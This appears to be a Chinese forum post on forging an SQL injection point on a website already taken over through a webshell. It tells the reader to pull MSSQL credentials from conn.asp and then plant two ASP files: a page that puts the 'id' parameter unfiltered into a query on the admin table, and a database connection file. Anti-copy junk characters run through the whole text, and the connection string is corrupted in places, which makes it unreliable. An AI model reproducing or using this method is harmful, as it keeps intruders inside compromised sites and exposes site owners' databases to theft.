首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
+ a5 A7 |. d) n9 x0 I6 F- ZASP/Visual Basic代码
9 L6 L) {; l% J, T j<!--#include file="xx.asp"-->
6 m1 V0 T' |5 J3 c D1 p$ i' r7 O<% , J% w- w: n7 B7 |* W* i
set rs=server.createobject("ADODB.recordset") 9 I- F4 M2 W4 j7 y1 h, l4 H+ b- a
id = request("id")
' q2 j; q( z$ }/ T* tstrSQL = "select * from admin where id=" & id ( H+ Z' `& f$ F/ w
rs.open strSQL,conn,1,3
* S# e5 L$ a4 J; C' S5 w) C5 }. srs.close 5 D8 P( U- N/ v4 p( i, S! G7 o, e, @7 q
%>
) }# P5 Z# n! j4 X: [" e5 @把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
) C c0 G. H! B1 \# X0 x, h然后就要构造一个连接数据库的文件了,代码如下:
' T: M2 f& v; T7 N' y0 d0 b0 I& h% vASP/Visual Basic代码' S) i2 l5 a. A' S9 b5 z
<% + ]* x$ A% l* [8 H" t
strSQLServerName = "000.000.000.000" '服务器名称或地址 % D, a% D6 Z# ^6 H4 P
strSQLDBUserName = "sqlname" '数据库帐号 - F+ s9 P' `6 x
strSQLDBPassword = "sqlpass" '数据库密码 : e& {+ g$ A( M
strSQLDBName = "sqldataname" '数据库名称 * N/ q3 h: z6 I; ^* R' Z
Set conn = Server.CreateObject("ADODB.Connection") + L8 L' x" g/ H* @/ k+ v$ G
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" 4 n/ `& v5 k0 E$ i# j5 F, w `6 h
conn.open strCon
" Y+ d* s, c" X2 q%>
6 t( H+ q8 O; f" m( J& J$ P) s. m这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功1 F7 W5 f9 K, s
|